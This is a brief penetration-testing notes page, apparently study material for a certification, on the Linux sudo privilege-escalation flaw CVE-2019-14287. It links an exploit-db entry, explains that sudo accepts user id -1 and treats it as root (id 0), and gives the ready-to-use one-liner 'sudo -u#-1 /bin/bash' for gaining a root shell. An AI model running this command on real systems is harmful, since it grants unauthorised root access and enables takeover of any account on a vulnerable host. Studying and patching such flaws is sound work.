// notes/ PrivEsc — Linux
🐧

Sudo CVE 2019 14287 Sudo U 1 Bin Bash

{% embed url="<https://www.exploit-db.com/exploits/47502" %}

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/sudo_cve-2019-14287-sudo-u-1-bin-bash

CVE-2019-14287 (sudo -u#-1 /bin/bash)

{% embed url="https://www.exploit-db.com/exploits/47502" %}

This can be used to take over any user account on the system, simple and straight forward.

py
01Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
02-u#-1 returns as 0 which is root's id
code
01sudo -u#-1 /bin/bash